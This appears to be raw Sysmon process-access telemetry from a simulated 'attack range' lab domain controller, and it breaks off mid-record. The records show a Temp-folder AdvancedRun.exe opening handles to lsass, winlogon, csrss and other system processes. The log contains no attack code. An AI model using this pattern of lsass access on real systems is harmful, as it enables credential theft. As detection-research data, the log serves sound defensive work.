22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0D00-000000002402}900C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0C00-000000002402}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0B00-000000002402}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0A00-000000002402}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0800-000000002402}492C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0700-000000002402}484C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0500-000000002402}412C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.727{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-0200-000000002402}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.727{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.724{834264DD-0AAD-61E7-0B00-000000002402}6285236C:\Windows\system32\lsass.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002968340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.724{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1897-61E7-9802-000000002402}5612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1896-61E7-9302-000000002402}4112C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-181A-61E7-5902-000000002402}6116C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0FC8-61E7-5701-000000002402}4600C:\Users\Administrator\Desktop\bacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F900-000000002402}5304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Ad